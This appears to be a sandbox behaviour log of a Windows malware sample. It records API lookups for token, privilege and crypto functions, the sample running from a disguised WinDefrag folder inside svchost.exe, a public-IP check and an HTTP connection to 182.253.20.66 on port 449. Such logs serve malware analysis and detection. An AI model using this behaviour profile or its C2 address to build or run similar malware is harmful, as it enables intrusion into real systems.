| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrcmpiW, address_out = 0x77b31930 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileW, address_out = 0x77b31870 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = ReadFile, address_out = 0x77b31500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x77b435a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetFilePointer, address_out = 0x77b31150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetVersion, address_out = 0x77b301d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x77b42f80 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetVersionExW, address_out = 0x77b2d910 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x77b35cf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x77b33f40 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x77b35a50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = lstrlenA, address_out = 0x77b3caf0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x77bb9330 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x77b39b70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x77b33ee0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x77b36500 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x77b365e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x77b435f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x77b35b50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Process32FirstW, address_out = 0x77b21e00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = Process32NextW, address_out = 0x77b220f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x77b221e0 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x7feff0e0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameW, address_out = 0x7feff0f1fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetTokenInformation, address_out = 0x7feff0fbd50 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = LookupAccountSidW, address_out = 0x7feff0fb898 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = DuplicateTokenEx, address_out = 0x7feff0ed310 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CreateProcessAsUserW, address_out = 0x7feff0eafe8 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = EqualSid, address_out = 0x7feff0fb820 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = OpenProcessToken, address_out = 0x7feff0fbd70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = FreeSid, address_out = 0x7feff0fb818 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x7feff0fb63c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyKey, address_out = 0x7feff0eafa0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptHashData, address_out = 0x7feff0edac0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyHash, address_out = 0x7feff0edb00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptDecrypt, address_out = 0x7feff11b6d0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptCreateHash, address_out = 0x7feff0edad4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptImportKey, address_out = 0x7feff0eaf6c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x7feff0f2040 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptReleaseContext, address_out = 0x7feff0edd10 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptSetKeyParam, address_out = 0x7feff11b508 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7feff0ed98c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptGetHashParam, address_out = 0x7feff0edb20 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x7feff0fb9e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7feff0fb9b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RevertToSelf, address_out = 0x7feff0edd00 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegCreateKeyExW, address_out = 0x7feff0fb520 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegCloseKey, address_out = 0x7feff100710 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7feff1006f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = RegSetValueExW, address_out = 0x7feff0f1ed0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x7feff0e89a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SetSecurityInfo, address_out = 0x7feff0e8420 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetSecurityInfo, address_out = 0x7feff0ea8e0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SetEntriesInAclW, address_out = 0x7feff0f3540 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetLengthSid, address_out = 0x7feff0fb580 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CopySid, address_out = 0x7feff0fbda0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x7feff0fb504 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7feff0fb5a0 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x7feffa40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoCreateInstance, address_out = 0x7feffa67490 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ole32.dll, function = CoUninitialize, address_out = 0x7feffa61314 |
|
1 | |
| Module | Load | module_name = CRYPT32.dll, base_address = 0x7fefddf0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\crypt32.dll, function = CryptStringToBinaryW, address_out = 0x7fefde3e9a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\crypt32.dll, function = CryptBinaryToStringW, address_out = 0x7fefde24198 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x7feff640000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathFindFileNameW, address_out = 0x7feff653920 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathAddBackslashW, address_out = 0x7feff653f70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathRenameExtensionW, address_out = 0x7feff66e6c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIW, address_out = 0x7feff64fb70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathRemoveBackslashW, address_out = 0x7feff64d014 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathRemoveFileSpecW, address_out = 0x7feff64a43c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = PathFindExtensionW, address_out = 0x7feff652b00 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x77c40000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = NtQueryInformationProcess, address_out = 0x77c914a0 |
|
1 | |
| Module | Load | module_name = IPHLPAPI.dll, base_address = 0x7fefb680000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x7fefb68792c |
|
1 | |
| Module | Load | module_name = USERENV.dll, base_address = 0x7fefcf30000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\userenv.dll, function = CreateEnvironmentBlock, address_out = 0x7fefcf310b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\userenv.dll, function = DestroyEnvironmentBlock, address_out = 0x7fefcf31080 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\userenv.dll, function = LoadUserProfileW, address_out = 0x7fefcf31170 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\userenv.dll, function = UnloadUserProfile, address_out = 0x7fefcf33670 |
|
1 | |
| System | Sleep | duration = 1 milliseconds (0.001 seconds) |
|
1000 | |
| Module | Get Filename | module_name = WS2_32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe, size = 512 |
|
1 | |
| System | Get Time | type = Ticks, time = 303780 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = Ncrypt.dll, base_address = 0x7fefd620000 |
|
1 | |
| Module | Load | module_name = Bcrypt.dll, base_address = 0x7fefd5f0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ncrypt.dll, function = NCryptOpenStorageProvider, address_out = 0x7fefd629990 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ncrypt.dll, function = NCryptImportKey, address_out = 0x7fefd6255f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ncrypt.dll, function = NCryptDeleteKey, address_out = 0x7fefd64f6a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ncrypt.dll, function = NCryptFreeObject, address_out = 0x7fefd625c30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptOpenAlgorithmProvider, address_out = 0x7fefd5f2640 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptImportKeyPair, address_out = 0x7fefd5f1d30 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptGetProperty, address_out = 0x7fefd5f1510 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptVerifySignature, address_out = 0x7fefd605bc0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptCloseAlgorithmProvider, address_out = 0x7fefd5f32b0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\bcrypt.dll, function = BCryptDestroyKey, address_out = 0x7fefd5f16a0 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Mutex | Create | mutex_name = Global\E0B7509842600 |
|
1 | |
| Module | Load | module_name = kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77c933a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x77b43050 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x77b43070 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x77c73f20 |
|
1 | |
| Module | Get Filename | module_name = WS2_32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe, size = 260 |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.tmp, type = file_attributes |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | module_name = WS2_32.dll, process_name = c:\windows\system32\svchost.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\WinDefrag\tmp7149.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| COM | Create | interface = 2FABA4C7-4DA9-4013-9697-20CC3FD40F85, cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x77b20000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x77b2b7e0 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| File | Get Info | filename = Data\, type = file_attributes |
|
1 | |
| File | Create Directory | Data\ |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| System | Get Time | type = Ticks, time = 307899 |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = icanhazip.com, server_port = 80 |
|
1 | |
| Inet | Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, accept_types = 0 |
|
1 | |
| Inet | Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = icanhazip.com/ |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 14, size_out = 14 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| COM | Create | interface = 2933BF81-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER |
|
2 | |
| System | Get Info | type = Operating System |
|
1 | |
| File | Write | size = 121 |
|
1 | |
| File | Write | size = 2 |
|
1 | |
| File | Write | size = 34 |
|
1 | |
| File | Write | size = 2 |
|
1 | |
| File | Write | size = 71 |
|
1 | |
| File | Write | size = 2 |
|
1 | |
| File | Write | size = 47 |
|
1 | |
| File | Write | size = 2 |
|
1 | |
| File | Write | size = 16 |
|
1 | |
| File | Write | size = 2 |
|
1 | |
| File | Write | size = 72 |
|
1 | |
| File | Write | size = 2 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 182.253.20.66, server_port = 449 |
|
1 |
Thread 0x870
14
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 1000 milliseconds (1.000 seconds) |
|
14 |
